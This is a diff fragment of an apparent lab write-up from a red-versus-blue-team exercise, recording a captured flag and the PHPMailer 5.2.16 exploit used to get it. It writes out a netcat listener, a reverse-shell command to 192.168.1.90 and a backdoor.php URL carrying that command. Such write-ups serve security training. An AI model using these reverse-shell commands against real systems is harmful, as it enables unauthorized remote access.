patricknakayama/Red_vs_Blue_Team/OffensiveSummary.md

   - `flag2.txt`: 6a8ed560f0b5358ecf844108048eb337
     - **Exploit Used**:
-      - Used Searchsploit to find vulnerability associated with PHPMailer 5.2.16, exploited with bash script to open backdoor on target, and opened shell on target with Ncat listener.
+      - Used `Searchsploit` to find vulnerability associated with PHPMailer 5.2.16, exploited with bash script to open backdoor on target, and opened reverse shell on target with `Ncat` listener.
     - **Command**: `nc -lnvp 4444`
     - **Command**: `nc 192.168.1.90 4444 -e /bin/bash`
     - **URL**: `192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash`